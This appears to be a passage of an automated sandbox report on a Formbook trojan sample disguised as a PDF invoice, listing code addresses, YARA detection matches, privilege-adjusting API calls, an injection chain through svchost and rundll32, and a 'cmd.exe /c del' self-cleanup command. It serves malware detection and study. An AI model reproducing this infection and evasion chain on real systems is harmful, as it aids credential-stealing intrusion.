          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E1D5B03_2_04E1D5B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E375713_2_04E37571
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E316CC3_2_04E316CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DC56303_2_04DC5630
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3F7B03_2_04E3F7B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3F0E03_2_04E3F0E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E370E93_2_04E370E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D870C03_2_04D870C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E2F0CC3_2_04E2F0CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D8B1B03_2_04D8B1B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E4B16B3_2_04E4B16B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D6F1723_2_04D6F172
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB516C3_2_04DB516C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E212ED3_2_04E212ED
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D9B2C03_2_04D9B2C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D9D2F03_2_04D9D2F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D852A03_2_04D852A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DC739A3_2_04DC739A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D6D34C3_2_04D6D34C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3132D3_2_04E3132D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3FCF23_2_04E3FCF2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DF9C323_2_04DF9C32
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D9FDC03_2_04D9FDC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E37D733_2_04E37D73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D83D403_2_04D83D40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E31D5A3_2_04E31D5A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D89EB03_2_04D89EB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D43FD53_2_04D43FD5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D43FD23_2_04D43FD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D81F923_2_04D81F92
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3FFB13_2_04E3FFB1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3FF093_2_04E3FF09
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D838E03_2_04D838E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DED8003_2_04DED800
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D899503_2_04D89950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D9B9503_2_04D9B950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E159103_2_04E15910
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E2DAC63_2_04E2DAC6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E21AA33_2_04E21AA3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E1DAAC3_2_04E1DAAC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DC5AA03_2_04DC5AA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E37A463_2_04E37A46
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3FA493_2_04E3FA49
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DF3A6C3_2_04DF3A6C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBDBF93_2_04DBDBF9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DF5BF03_2_04DF5BF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D9FB803_2_04D9FB80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3FB763_2_04E3FB76
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C5E5613_2_02C5E561
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C5EB153_2_02C5EB15
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C49E4B3_2_02C49E4B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C49E503_2_02C49E50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C49E0A3_2_02C49E0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C42FB03_2_02C42FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C42D883_2_02C42D88
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C42D903_2_02C42D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BEA0363_2_04BEA036
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BEE5CD3_2_04BEE5CD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BE2D023_2_04BE2D02
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BE10823_2_04BE1082
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BE89123_2_04BE8912
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BEB2323_2_04BEB232
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BE5B323_2_04BE5B32
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BE5B303_2_04BE5B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 103 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 99 times
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: String function: 00770D27 appears 70 times
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: String function: 00778B40 appears 42 times
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: String function: 00757F41 appears 35 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04DEEA12 appears 86 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04DFF290 appears 103 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04DB5130 appears 58 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04DC7E54 appears 107 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04D6B970 appears 262 times
          Source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670465741.0000000004333000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Genesis RMS Private Limited November 2024 pdf.exe
          Source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670219592.00000000044DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Genesis RMS Private Limited November 2024 pdf.exe
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.4140991356.000000000E62C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Genesis RMS Private Limited November 2024 pdf.exe PID: 7684, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 7700, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: rundll32.exe PID: 7800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/2@11/1
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BA2D5 GetLastError,FormatMessageW,0_2_007BA2D5
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007A8713 AdjustTokenPrivileges,CloseHandle,0_2_007A8713
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007A8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007A8CC3
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007BB59E
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007CF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_007CF121
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BC602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_007BC602
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00754FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00754FE9
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeFile created: C:\Users\user\AppData\Local\Temp\autD964.tmpJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCommand line argument: WLDP.DLL3_2_00C24136
          Source: C:\Windows\SysWOW64\rundll32.exeCommand line argument: localserver3_2_00C24136
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
          Source: Genesis RMS Private Limited November 2024 pdf.exeReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic file information: File size 1086464 > 1048576
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
